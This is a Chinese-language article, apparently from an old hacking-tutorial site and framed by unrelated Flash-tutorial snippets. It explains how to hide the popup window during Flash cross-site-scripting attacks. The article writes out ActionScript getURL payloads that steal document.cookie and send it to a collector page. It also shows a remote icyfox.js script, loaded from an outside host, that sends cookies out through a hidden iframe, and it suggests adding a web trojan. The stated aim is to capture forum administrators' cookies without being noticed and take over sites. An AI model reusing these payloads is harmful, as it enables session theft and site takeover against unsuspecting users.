推薦：Flash特效動(dòng)畫制作：飛舞的螺炫
今天和廣大的FLASH制作愛好者共享是一種特炫的螺旋動(dòng)畫效果，讓我們先來看一下最終的效果吧!點(diǎn)擊這里下載源文件下面讓我們一起來學(xué)習(xí)這個(gè)Flash螺旋特效動(dòng)畫的

前些天一直忙著學(xué)習(xí)WIN32匯編，一直懶得寫文章，這些天來似乎Flash跨站攻擊鬧的挺兇的，但在實(shí)施Flash跨站攻擊時(shí)的那個(gè)彈出的IE窗口很輕易引起別人的懷疑，而使得Flash跨站攻擊失敗，這的確讓人多少有點(diǎn)頭疼，大家是不是也一直在尋找實(shí)施Flash跨站攻擊時(shí)不彈出IE窗口的方法來隱藏自己的攻擊行為呢？下面大家和我一起來解決這個(gè)不大不小的問題，讓Flash跨站攻擊更完美吧！
一般來說大家在進(jìn)行Flash跨站攻擊時(shí)都是自己做一個(gè)Flash動(dòng)畫，并在第一幀中加入用于跳轉(zhuǎn)到其他URL的AtionScript腳本函數(shù)，如下：
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的網(wǎng)頁(yè)地址?’ document cookie)","_self") 然后把這個(gè)Flash動(dòng)畫置于論壇中的簽名、貼子或短信消息中，用來獲得治理員或用戶的Cookie，從而得到治理權(quán)限，進(jìn)一步伺機(jī)控制整個(gè)站點(diǎn),最終達(dá)到自己的目的。我們可以看到在整個(gè)跨站攻擊中最重要的就是這個(gè)AtionScript腳本啦！也就是這個(gè)腳本中用到的代碼打開了一個(gè)我們又愛又恨的窗口，所以我們也只能從改造這個(gè)腳本代碼來實(shí)現(xiàn)隱藏或者是去掉彈出的IE窗口，除此外別無(wú)它法！
我們先分析一下上面的AtionScript腳本，它使用AtionScript腳本函數(shù)"getURL"跳轉(zhuǎn)到一個(gè)使用JavaScript協(xié)議的URL（JavaScript協(xié)議后面就是我們非常熟悉的JavaScript腳本代碼），在JavaScript中使用document.cookie的到Cookie，并把Cookie和一個(gè)用于收集Cookie的網(wǎng)頁(yè)地址連成一個(gè)http協(xié)議的URL地址，最后使用window.open打開合成的URL地址，從而把Cookie用GET方式發(fā)送到用于收集Cookie的網(wǎng)頁(yè)，并記錄下來。
通過上面的分析我們進(jìn)一步了解那個(gè)彈出的IE窗口是由于JavaScript協(xié)議中的代碼window.open所生成的，相信大家都知道window.open的第二個(gè)參數(shù)用來指定打開的窗口的名字，其通用名稱有"_media （IE6.0 在瀏覽器左邊的媒體面板內(nèi)打開）"、"_blank （在新窗口中打開）"、"_parent （在當(dāng)前框架的父框架內(nèi)打開。假如當(dāng)前框架無(wú)父框架，此參數(shù)值等同于 _self）"、"_search （IE5.0 在瀏覽器左邊的搜索面板內(nèi)打開）"、"_self（在當(dāng)前窗口中打開，覆蓋當(dāng)前文檔）"、"_top （在所有框架之外的最頂層窗口中打開 。假如當(dāng)前窗口無(wú)框架結(jié)構(gòu)，此參數(shù)值等同于 _self ）"等幾種，假如我們以"_search"來打開窗口，不是就沒有了彈出的IE窗口了嗎？AtionScript腳本改為：
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的網(wǎng)頁(yè)地址?’ document cookie,’_search’)","_self")

當(dāng)然，這樣做會(huì)打開搜索面板，也會(huì)引起懷疑，但卻可以躲過那些關(guān)閉彈出窗口軟件的追殺！姑且也算一種方法吧！
假如僅僅是上面所說的，相信不少讀者要把我。。。。。。
看到這里聰明的你是不是想到了點(diǎn)解決的思路？對(duì)！既然支持JavaScript啦，還有啥東東會(huì)不能解決呢？JavaScript真的是好處多多呀！
假如你曾看了我的那篇"打造一個(gè)完美的ＩＥ網(wǎng)頁(yè)木馬"的文章，并且你對(duì)其中的代碼深深理解的話，你可以自己先去想象一下啦！
在那篇文章中有下面這樣一段代碼：

jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);
window.open("file:BLOCKED SCRIPTdocument.all.tags(’SCRIPT’)[0].src=’" jsurl "’;eval();","icyfoxlovelace");

使用了javascript協(xié)議把自己網(wǎng)站上的一個(gè)js代碼文件插入到了本地文件中，同樣的道理我們也可以用它把一個(gè)js代碼文件插入到進(jìn)行跨站攻擊的論壇網(wǎng)頁(yè)中，相應(yīng)的AtionScript腳本改為：

getURL("BLOCKED SCRIPTdocument.all.tags(’SCRIPT’)[0].src=’http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js’;eval();","_self")

其中icyfox.js得內(nèi)容如下：

cookieurl="http://用于收集Cookie的網(wǎng)頁(yè)地址?cookie=" escape(document.cookie);

/*這里使用了escape(）對(duì)cookie編碼，用來防止cookie中的一些非凡字符*/
document.body.insertAdjacentHTML('beforeEnd','<iframe WIDTH=0px HEIGHT=0px style="display:none;" src="' cookieurl '"><\/iframe>');
/*這里使用了insertAdjacentHTML在body的最后插入了一個(gè)不可見的框架*/

這里主要是利用了可以在一個(gè)網(wǎng)頁(yè)中引入不同域中的javascript代碼文檔，而且所引入的javascript代碼文檔會(huì)和本網(wǎng)頁(yè)融為一體的特點(diǎn)！

好啦！至此Flash跨站攻擊彈出IE窗口的問題算是解決啦！當(dāng)然假如你愿意，在icyfox.js中加個(gè)網(wǎng)頁(yè)木馬之類的我也無(wú)話可說!
最后我再順便說一句，它同樣可以用于在其他類型的跨站腳本功擊中隱藏彈出的IE窗口！比起利用Microsoft.XMLHTTP控件發(fā)送COOKIE要隨意的多，因?yàn)樗�不�?huì)像Microsoft.XMLHTTP控件那樣只能發(fā)給當(dāng)前服務(wù)器，還有焦點(diǎn)上czy的"利用Microsoft.XMLHTTP控件發(fā)送COOKIE"一文中提到這樣一句話：

"以前我想了一個(gè)在網(wǎng)頁(yè)中用insertAdjacentHTML方法來注入HTML語(yǔ)句的辦法勉強(qiáng)可以作到發(fā)送COOKIE不出現(xiàn)IE窗口，但是在實(shí)際使用中有時(shí)會(huì)碰到IE出錯(cuò)。"

具我分析是因?yàn)樵贑OOKIE中存在了一些非凡字符，而czy沒有正確處理或是編碼，才會(huì)在實(shí)際使用中有時(shí)會(huì)碰到IE出錯(cuò)，所以上面代碼我用了escape(）對(duì)cookie編碼，在接受到cookie后請(qǐng)注重用unescape(）來解碼！

分享：Flash高級(jí)技巧之使用setTimeout
在Flash8中有個(gè)函數(shù)是在幫助文檔中沒有的﹐也不知道是刻意還是疏忽﹐最近有人提起才想到。而這個(gè)setTimeout函數(shù)就類似于我們常用的setInterval可指定延遲時(shí)間